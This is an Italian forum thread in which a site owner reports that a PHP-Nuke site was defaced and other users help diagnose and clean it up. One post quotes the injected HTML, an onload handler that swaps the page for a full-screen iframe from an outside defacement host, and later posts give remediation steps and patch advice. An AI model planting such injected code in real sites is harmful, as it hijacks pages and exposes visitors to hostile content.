Visualizzazione risultati 1 fino 14 di 14

Discussione: Mi hanno bucato il sito.....Aiuto!!!

Guest

Predefinito Mi hanno bucato il sito.....Aiuto!!!

Salve a tutti..ispero che questa sia la sezione giusta x postare sennò chiedo scusa in anticipo!!
    Il titolo del topic è alquanto esplicativo

www.catproduction.altervista.org

mi hanno bucato il sito..vi prego...cè modo x rimediare..?il backup del database non lo faccio da un bel po di tempo..spero nn sia successo l irreparabile..cè modo x rintracciare l ip del simpaticone? avevo messo sul sito un modulo antihacker ma ora nn ricordo come si kiama..si vede che non è servito...

Help me please....

Ps non è stato modificato nel il nick nel l'account xkè riesco benissimo tramite ftp ad entrare...

L'avatar di Gianluca
    Gianluca non è connesso Amministratore

Predefinito

Il sito web si vede normalmente, è stato già ripristinato?

In ogni modo AlterVista offre un backup settimanale del database mysql (automatico), vedi sezione novità del forum, chiaramente se non aggiornerai gli scripts vulnerabili l'episodio è destinato a ripetersi.
    Gianluca

L'avatar di Taitaonline
    Taitaonline non è connesso Utente storico

Predefinito

No, Gianluca... Non so quanto tu sei rimasto sulla Home ma, dopo 30 secondi (o giù di lì) la stessa scompare e appare una pagina dove appunto è segnalato il danno.

[EDIT]
    Attenzione: non provate a cliccare su quella pagina che alla fine vi impalla il browser ! (almeno a me così è successo) ... Chiudete tramite la X rossa.
    Ultima modifica di Taitaonline : 10-03-2006 alle ore 18.26.34
    ...Il grano che nasce e l'acqua che va, è un dono di tutti, padroni non ha...
    My Site FAQ di AlterVista Regolamento di AlterVista

L'avatar di chrisbiro
    chrisbiro non è connesso Utente storico

Predefinito

.... si praticamente è impostato una sepece di redirect che ti porta su una pagina con la scritta a cascata con la seguente dicitura "Net Hakers".
    Ultima modifica di chrisbiro : 10-03-2006 alle ore 18.27.29

Guest

Predefinito

allora...qualcuno sa come potrei riparare....

Guest

Predefinito

il tipo ha inserito

Codice:
    <body topmargin=0 leftmargin=6 onload="document.body.innerHTML='<iframe width=100% height=100% src=http://nethacker.vilabol.uol.com.br//INDEX.htm></iframe>';">
    appena sopra il footer

disabilitando il javascript, rendi innocua tutta la baracca e hai tempo di sistemare.
    Dovresti cercare quale template è stato modificato (probabilmente il footer o quello globale)

mavericck

Guest

Predefinito

dove posso trovare una guida a riguardo..in realtà non tocco php&simili da una vita..e se prima ero un niubbo con qlk conoscenza...ora non ricordo + nulla...
    se qualcuno mi potesse dare una mano mi farebbe piacere..so che del mio piacere non ve ne fate un kakkioXD xò lo chiedo lo stesso;p

Guest

Predefinito

Eh..io lo farei volentieri, ma sarebbe da vedere la struttura del sito..

Guest

Predefinito

ma in pratica cosa ha esattamente toccato?come posso fare a capirlo?

L'avatar di Evcz
    Evcz non è connesso Utente storico

Predefinito

secondo me ti ha semplicemente modificato il campo sql relativo al codice da aggiungere al footer...

se non vuoi installare cose varie sul tuo pc puoi seguire due bassi:

0) chiudere il browser

1) modificare con notepad il file
    c:\windows\system32\drivers\etc\hosts
    aggiungendo alla fine la riga:
    127.0.0.1 nethacker.vilabol.uol.com.br

2) aprire il browser, andare sul tuo sito, andare nell'amministrazione -> preferenze e modificare i campi relativi al footer (sono 3 campi mi pare) togliendo il codice aggiunto dallo script kiddie

:)
    There are three kinds of people in this world: people who watch things happen ... people who complain about things that happen ... and people who make things happen...

Guest

Predefinito

grazie mille!!!!ho disabilitato gli script e ho fatto come mi hai detto..non ricordavo cosa fosse il footer;p..mi hai acceso una lampadina!

ma come è in grado di fare una cosa del genere..può anche entrare e cancellare tutto?come ha fatto a fare quello che ha fatto...-_-"?uso nuckesentinel..questo avrebbe dovuto evitare quello che è successo?
    grazie ancora!!

L'avatar di Evcz

Predefinito

dipende che versione usi di nukesentinel.. e comunque nukesentinel va considerato un "aggiunta"... l'importante è avere già il nuke corretto...
    (e comunque che versione di sentinel: vecchia o recente?)

a partire dall patch di sicurezza di www.nukefixes.com :)
    There are three kinds of people in this world: people who watch things happen ... people who complain about things that happen ... and people who make things happen...

Guest

Predefinito

2.2 ...vekkiotta..penso...non tocco il sito da tempo immemorabile...ihihih

L'avatar di Evcz

Predefinito

la versione attuale è la 2.4.2... è fatta per phpnuke7... se hai versioni più vecchie devi modificarla...